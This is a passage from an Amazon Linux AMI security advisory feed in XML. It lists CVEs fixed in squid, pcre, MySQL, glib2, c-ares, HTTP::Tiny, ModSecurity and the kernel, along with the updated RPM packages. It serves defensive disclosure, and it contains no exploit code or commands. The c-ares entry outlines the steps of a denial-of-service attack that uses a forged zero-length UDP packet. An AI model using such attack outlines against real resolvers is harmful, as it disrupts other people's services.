from="linux-security@amazon.com"><id>ALAS-2023-1766</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1766: important priority package update for squid</title><issued date="2023-06-05 16:39:00" /><updated date="2023-06-08 23:39:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2020-8517:
An issue was discovered in Squid before 4.10. Due to incorrect input validation, the NTLM authentication credentials parser in ext_lm_group_acl may write to memory outside the credentials buffer. On systems with memory access protections, this can result in the helper process being terminated unexpectedly. This leads to the Squid process also terminating and a denial of service for all clients using the proxy.
CVE-2016-10003:
Incorrect HTTP Request header comparison in Squid HTTP Proxy 3.5.0.1 through 3.5.22, and 4.0.1 through 4.0.16 results in Collapsed Forwarding feature mistakenly identifying some private responses as being suitable for delivery to multiple clients.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-10003" title="" id="CVE-2016-10003" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-8517" title="" id="CVE-2020-8517" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid-debuginfo" version="3.5.20" release="17.48.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.5.20-17.48.amzn1.x86_64.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.48.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-migration-script-3.5.20-17.48.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="17.48.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.5.20-17.48.amzn1.x86_64.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.48.amzn1" epoch="7" arch="i686"><filename>Packages/squid-migration-script-3.5.20-17.48.amzn1.i686.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.48.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.5.20-17.48.amzn1.i686.rpm</filename></package><package name="squid" version="3.5.20" release="17.48.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.5.20-17.48.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1767</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1767: medium priority package update for pcre</title><issued date="2023-06-05 16:39:00" /><updated date="2023-06-08 23:38:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8394:
PCRE before 8.38 mishandles the (?(<digits>) and (?(R<digits>) conditions, which allows remote attackers to cause a denial of service (integer overflow) or possibly have unspecified other impact via a crafted regular expression, as demonstrated by a JavaScript RegExp object encountered by Konqueror.
CVE-2015-8390:
PCRE before 8.38 mishandles the [: and \ substrings in character classes, which allows remote attackers to cause a denial of service (uninitialized memory read) or possibly have unspecified other impact via a crafted regular expression, as demonstrated by a JavaScript RegExp object encountered by Konqueror.
CVE-2015-5073:
Heap-based buffer overflow in the find_fixedlength function in pcre_compile.c in PCRE before 8.38 allows remote attackers to cause a denial of service (crash) or obtain sensitive information from heap memory and possibly bypass the ASLR protection mechanism via a crafted regular expression with an excess closing parenthesis.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5073" title="" id="CVE-2015-5073" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8390" title="" id="CVE-2015-8390" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8394" title="" id="CVE-2015-8394" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="pcre" version="8.21" release="7.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/pcre-8.21-7.9.amzn1.x86_64.rpm</filename></package><package name="pcre-devel" version="8.21" release="7.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/pcre-devel-8.21-7.9.amzn1.x86_64.rpm</filename></package><package name="pcre-static" version="8.21" release="7.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/pcre-static-8.21-7.9.amzn1.x86_64.rpm</filename></package><package name="pcre-debuginfo" version="8.21" release="7.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/pcre-debuginfo-8.21-7.9.amzn1.x86_64.rpm</filename></package><package name="pcre-tools" version="8.21" release="7.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/pcre-tools-8.21-7.9.amzn1.x86_64.rpm</filename></package><package name="pcre-static" version="8.21" release="7.9.amzn1" epoch="0" arch="i686"><filename>Packages/pcre-static-8.21-7.9.amzn1.i686.rpm</filename></package><package name="pcre-devel" version="8.21" release="7.9.amzn1" epoch="0" arch="i686"><filename>Packages/pcre-devel-8.21-7.9.amzn1.i686.rpm</filename></package><package name="pcre-debuginfo" version="8.21" release="7.9.amzn1" epoch="0" arch="i686"><filename>Packages/pcre-debuginfo-8.21-7.9.amzn1.i686.rpm</filename></package><package name="pcre-tools" version="8.21" release="7.9.amzn1" epoch="0" arch="i686"><filename>Packages/pcre-tools-8.21-7.9.amzn1.i686.rpm</filename></package><package name="pcre" version="8.21" release="7.9.amzn1" epoch="0" 
arch="i686"><filename>Packages/pcre-8.21-7.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1768</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1768: important priority package update for mysql57</title><issued date="2023-06-07 23:52:00" /><updated date="2024-05-23 21:37:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-22007:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Replication). Supported versions that are affected are 5.7.41 and prior and 8.0.32 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 4.9 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).
CVE-2023-21980:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Client programs). Supported versions that are affected are 5.7.41 and prior and 8.0.32 and prior. Difficult to exploit vulnerability allows low privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of MySQL Server. CVSS 3.1 Base Score 7.1 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H).
CVE-2023-21912:
Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Security: Privileges). Supported versions that are affected are 5.7.41 and prior and 8.0.30 and prior. Easily exploitable vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server. CVSS 3.1 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21912" title="" id="CVE-2023-21912" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-21980" title="" id="CVE-2023-21980" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-22007" title="" id="CVE-2023-22007" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mysql57-test" version="5.7.42" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-test-5.7.42-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded" version="5.7.42" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-5.7.42-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql57-server" version="5.7.42" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-server-5.7.42-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql57-errmsg" version="5.7.42" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-errmsg-5.7.42-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql57-common" version="5.7.42" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-common-5.7.42-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.42" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-embedded-devel-5.7.42-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql57-devel" version="5.7.42" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-devel-5.7.42-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql57-libs" version="5.7.42" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-libs-5.7.42-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.42" release="1.19.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/mysql57-debuginfo-5.7.42-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql57" version="5.7.42" release="1.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/mysql57-5.7.42-1.19.amzn1.x86_64.rpm</filename></package><package name="mysql57-common" version="5.7.42" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-common-5.7.42-1.19.amzn1.i686.rpm</filename></package><package name="mysql57-devel" version="5.7.42" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-devel-5.7.42-1.19.amzn1.i686.rpm</filename></package><package name="mysql57-embedded" version="5.7.42" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-embedded-5.7.42-1.19.amzn1.i686.rpm</filename></package><package name="mysql57" version="5.7.42" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-5.7.42-1.19.amzn1.i686.rpm</filename></package><package name="mysql57-errmsg" version="5.7.42" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-errmsg-5.7.42-1.19.amzn1.i686.rpm</filename></package><package name="mysql57-test" version="5.7.42" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-test-5.7.42-1.19.amzn1.i686.rpm</filename></package><package name="mysql57-libs" version="5.7.42" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-libs-5.7.42-1.19.amzn1.i686.rpm</filename></package><package name="mysql57-server" version="5.7.42" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-server-5.7.42-1.19.amzn1.i686.rpm</filename></package><package name="mysql57-debuginfo" version="5.7.42" release="1.19.amzn1" epoch="0" arch="i686"><filename>Packages/mysql57-debuginfo-5.7.42-1.19.amzn1.i686.rpm</filename></package><package name="mysql57-embedded-devel" version="5.7.42" release="1.19.amzn1" epoch="0" 
arch="i686"><filename>Packages/mysql57-embedded-devel-5.7.42-1.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1769</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1769: medium priority package update for glib2</title><issued date="2023-06-07 23:52:00" /><updated date="2023-06-15 17:01:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8386:
PCRE before 8.38 mishandles the interaction of lookbehind assertions and mutually recursive subpatterns, which allows remote attackers to cause a denial of service (buffer overflow) or possibly have unspecified other impact via a crafted regular expression, as demonstrated by a JavaScript RegExp object encountered by Konqueror.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8386" title="" id="CVE-2015-8386" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glib2-debuginfo" version="2.36.3" release="5.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-debuginfo-2.36.3-5.25.amzn1.x86_64.rpm</filename></package><package name="glib2-fam" version="2.36.3" release="5.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-fam-2.36.3-5.25.amzn1.x86_64.rpm</filename></package><package name="glib2" version="2.36.3" release="5.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-2.36.3-5.25.amzn1.x86_64.rpm</filename></package><package name="glib2-devel" version="2.36.3" release="5.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-devel-2.36.3-5.25.amzn1.x86_64.rpm</filename></package><package name="glib2-doc" version="2.36.3" release="5.25.amzn1" epoch="0" arch="noarch"><filename>Packages/glib2-doc-2.36.3-5.25.amzn1.noarch.rpm</filename></package><package name="glib2-devel" version="2.36.3" release="5.25.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-devel-2.36.3-5.25.amzn1.i686.rpm</filename></package><package name="glib2" version="2.36.3" release="5.25.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-2.36.3-5.25.amzn1.i686.rpm</filename></package><package name="glib2-debuginfo" version="2.36.3" release="5.25.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-debuginfo-2.36.3-5.25.amzn1.i686.rpm</filename></package><package name="glib2-fam" version="2.36.3" release="5.25.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-fam-2.36.3-5.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1770</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1770: important priority package update for 
c-ares</title><issued date="2023-06-21 19:11:00" /><updated date="2023-06-29 23:54:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-32067:
Denial of Service.
Attack Steps:
The target resolver sends a query
The attacker forges a malformed UDP packet with a length of 0 and returns it to the target resolver
The target resolver erroneously interprets the 0 length as a graceful shutdown of the connection (this is only valid for TCP connections; UDP is connection-less)
Current resolution fails; DoS attack is achieved.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32067" title="" id="CVE-2023-32067" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="c-ares-debuginfo" version="1.17.2" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/c-ares-debuginfo-1.17.2-1.9.amzn1.x86_64.rpm</filename></package><package name="c-ares-devel" version="1.17.2" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/c-ares-devel-1.17.2-1.9.amzn1.x86_64.rpm</filename></package><package name="c-ares" version="1.17.2" release="1.9.amzn1" epoch="0" arch="x86_64"><filename>Packages/c-ares-1.17.2-1.9.amzn1.x86_64.rpm</filename></package><package name="c-ares" version="1.17.2" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/c-ares-1.17.2-1.9.amzn1.i686.rpm</filename></package><package name="c-ares-debuginfo" version="1.17.2" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/c-ares-debuginfo-1.17.2-1.9.amzn1.i686.rpm</filename></package><package name="c-ares-devel" version="1.17.2" release="1.9.amzn1" epoch="0" arch="i686"><filename>Packages/c-ares-devel-1.17.2-1.9.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1771</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1771: important priority package update for perl-HTTP-Tiny</title><issued date="2023-06-21 19:11:00" /><updated date="2023-06-30 00:27:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-31486:
HTTP::Tiny 0.082, a Perl core module since 5.13.9 and available standalone on CPAN, has an insecure default TLS configuration where users must opt in to verify certificates.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31486" title="" id="CVE-2023-31486" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="perl-HTTP-Tiny" version="0.033" release="3.7.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-HTTP-Tiny-0.033-3.7.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1772</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1772: medium priority package update for mod24_security</title><issued date="2023-06-21 19:11:00" /><updated date="2023-06-29 23:52:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2022-48279:
In ModSecurity before 2.9.6 and 3.x before 3.0.8, HTTP multipart requests were incorrectly parsed and could bypass the Web Application Firewall. NOTE: this is related to CVE-2022-39956 but can be considered independent changes to the ModSecurity (C language) codebase.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-48279" title="" id="CVE-2022-48279" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_security-debuginfo" version="2.8.0" release="5.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_security-debuginfo-2.8.0-5.28.amzn1.x86_64.rpm</filename></package><package name="mod24_security" version="2.8.0" release="5.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_security-2.8.0-5.28.amzn1.x86_64.rpm</filename></package><package name="mlogc24" version="2.8.0" release="5.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/mlogc24-2.8.0-5.28.amzn1.x86_64.rpm</filename></package><package name="mod24_security" version="2.8.0" release="5.28.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_security-2.8.0-5.28.amzn1.i686.rpm</filename></package><package name="mlogc24" version="2.8.0" release="5.28.amzn1" epoch="0" arch="i686"><filename>Packages/mlogc24-2.8.0-5.28.amzn1.i686.rpm</filename></package><package name="mod24_security-debuginfo" version="2.8.0" release="5.28.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_security-debuginfo-2.8.0-5.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1773</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1773: important priority package update for kernel</title><issued date="2023-06-21 19:11:00" /><updated date="2024-02-01 19:33:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2024-0775:
A use-after-free flaw was found in the __ext4_remount in fs/ext4/super.c in ext4 in the Linux kernel. This flaw allows a local user to cause an information leak problem while freeing the old quota file names before a potential failure, leading to a use-after-free.
CVE-2023-34256:
An issue was discovered in the Linux kernel before 6.3.3. There is an out-of-bounds read in crc16 in lib/crc16.c when called from fs/ext4/super.c because ext4_group_desc_csum does not properly check an offset.
CVE-2023-3111:
A use after free vulnerability was found in prepare_to_relocate in fs/btrfs/relocation.c in btrfs in the Linux Kernel. This possible flaw can be triggered by calling btrfs_ioctl_balance() before calling btrfs_ioctl_defrag().
CVE-2023-28466:
do_tls_getsockopt in net/tls/tls_main.c in the Linux kernel through 6.2.6 lacks a lock_sock call, leading to a race condition (with a resultant use-after-free or NULL pointer dereference).
CVE-2023-2269:
A denial of service problem was found, due to a possible recursive locking scenario, resulting in a deadlock in table_clear in drivers/md/dm-ioctl.c in the Linux Kernel Device Mapper-Multipathing sub-component.
CVE-2022-34918:
A heap buffer overflow flaw was found in the Linux kernel's Netfilter subsystem in the way a user provides incorrect input of the NFT_DATA_VERDICT type. This flaw allows a local user to crash or potentially escalate their privileges on the system.
CVE-2022-2586:
A use-after-free flaw was found in nf_tables cross-table in the net/netfilter/nf_tables_api.c function in the Linux kernel. This flaw allows a local, privileged attacker to cause a use-after-free problem at the time of table deletion, possibly leading to local privilege escalation.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-2586" title="" id="CVE-2022-2586" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-34918" title="" id="CVE-2022-34918" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2269" title="" id="CVE-2023-2269" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-28466" title="" id="CVE-2023-28466" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3111" title="" id="CVE-2023-3111" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34256" title="" id="CVE-2023-34256" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-0775" title="" id="CVE-2024-0775" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-debuginfo-common-x86_64" version="4.14.318" release="166.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.318-166.529.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.318" release="166.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.318-166.529.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.318" release="166.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.318-166.529.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.318" release="166.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.318-166.529.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="4.14.318" release="166.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.318-166.529.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.318" release="166.529.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.318-166.529.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.318" release="166.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.318-166.529.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.318" release="166.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.318-166.529.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.318" release="166.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.318-166.529.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.318" release="166.529.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.318-166.529.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.318" release="166.529.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.318-166.529.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="4.14.318" release="166.529.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.318-166.529.amzn1.i686.rpm</filename></package><package name="perf" version="4.14.318" release="166.529.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.318-166.529.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.318" release="166.529.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.318-166.529.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.318" release="166.529.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.318-166.529.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.318" release="166.529.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.318-166.529.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.318" 
release="166.529.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.318-166.529.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.318" release="166.529.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.318-166.529.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.318" release="166.529.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.318-166.529.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.318" release="166.529.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.318-166.529.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1774</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1774: important priority package update for squid</title><issued date="2023-06-21 19:11:00" /><updated date="2023-06-29 23:52:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-12526:
An issue was discovered in Squid before 4.9. URN response handling in Squid suffers from a heap-based buffer overflow. When receiving data from a remote server in response to an URN request, Squid fails to ensure that the response can fit within the buffer. This leads to attacker controlled data overflowing in the heap.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12526" title="" id="CVE-2019-12526" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="squid-migration-script" version="3.5.20" release="17.49.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-migration-script-3.5.20-17.49.amzn1.x86_64.rpm</filename></package><package name="squid" version="3.5.20" release="17.49.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-3.5.20-17.49.amzn1.x86_64.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.49.amzn1" epoch="7" arch="x86_64"><filename>Packages/squid-debuginfo-3.5.20-17.49.amzn1.x86_64.rpm</filename></package><package name="squid-debuginfo" version="3.5.20" release="17.49.amzn1" epoch="7" arch="i686"><filename>Packages/squid-debuginfo-3.5.20-17.49.amzn1.i686.rpm</filename></package><package name="squid" version="3.5.20" release="17.49.amzn1" epoch="7" arch="i686"><filename>Packages/squid-3.5.20-17.49.amzn1.i686.rpm</filename></package><package name="squid-migration-script" version="3.5.20" release="17.49.amzn1" epoch="7" arch="i686"><filename>Packages/squid-migration-script-3.5.20-17.49.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1775</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1775: medium priority package update for glib2</title><issued date="2023-06-21 19:11:00" /><updated date="2023-06-29 23:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8394:
PCRE before 8.38 mishandles the (?(<digits>) and (?(R<digits>) conditions, which allows remote attackers to cause a denial of service (integer overflow) or possibly have unspecified other impact via a crafted regular expression, as demonstrated by a JavaScript RegExp object encountered by Konqueror.
CVE-2015-8390:
PCRE before 8.38 mishandles the [: and \ substrings in character classes, which allows remote attackers to cause a denial of service (uninitialized memory read) or possibly have unspecified other impact via a crafted regular expression, as demonstrated by a JavaScript RegExp object encountered by Konqueror.
CVE-2015-5073:
Heap-based buffer overflow in the find_fixedlength function in pcre_compile.c in PCRE before 8.38 allows remote attackers to cause a denial of service (crash) or obtain sensitive information from heap memory and possibly bypass the ASLR protection mechanism via a crafted regular expression with an excess closing parenthesis.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5073" title="" id="CVE-2015-5073" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8390" title="" id="CVE-2015-8390" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8394" title="" id="CVE-2015-8394" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="glib2" version="2.36.3" release="5.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-2.36.3-5.26.amzn1.x86_64.rpm</filename></package><package name="glib2-fam" version="2.36.3" release="5.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-fam-2.36.3-5.26.amzn1.x86_64.rpm</filename></package><package name="glib2-doc" version="2.36.3" release="5.26.amzn1" epoch="0" arch="noarch"><filename>Packages/glib2-doc-2.36.3-5.26.amzn1.noarch.rpm</filename></package><package name="glib2-devel" version="2.36.3" release="5.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-devel-2.36.3-5.26.amzn1.x86_64.rpm</filename></package><package name="glib2-debuginfo" version="2.36.3" release="5.26.amzn1" epoch="0" arch="x86_64"><filename>Packages/glib2-debuginfo-2.36.3-5.26.amzn1.x86_64.rpm</filename></package><package name="glib2-devel" version="2.36.3" release="5.26.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-devel-2.36.3-5.26.amzn1.i686.rpm</filename></package><package name="glib2" version="2.36.3" release="5.26.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-2.36.3-5.26.amzn1.i686.rpm</filename></package><package name="glib2-debuginfo" version="2.36.3" release="5.26.amzn1" epoch="0" arch="i686"><filename>Packages/glib2-debuginfo-2.36.3-5.26.amzn1.i686.rpm</filename></package><package name="glib2-fam" version="2.36.3" release="5.26.amzn1" epoch="0" 
arch="i686"><filename>Packages/glib2-fam-2.36.3-5.26.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2023-1776</id><title>Amazon Linux AMI 2014.03 - ALAS-2023-1776: important priority package update for kernel</title><issued date="2023-06-27 23:45:00" /><updated date="2023-07-03 20:17:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2023-1206:
